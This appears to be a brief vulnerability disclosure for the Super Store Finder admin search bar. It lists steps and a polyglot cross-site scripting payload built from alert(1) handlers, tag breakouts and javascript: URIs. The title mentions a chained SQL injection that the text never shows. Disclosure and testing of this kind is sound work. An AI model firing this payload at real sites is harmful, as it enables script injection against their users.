#Title : XSS chained with SQL injection
#Researcher : Tisha Manandhar
#Vendor : Joe Iz, https://superstorefinder.net/
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/admin/stores.php
#Version Affected : 3.6 and below
#Date : 15 Sept 2023
# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/
# Step 2 : login
# Step 3: insert below payload in search bar
```javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)// 
```
XSS will execute
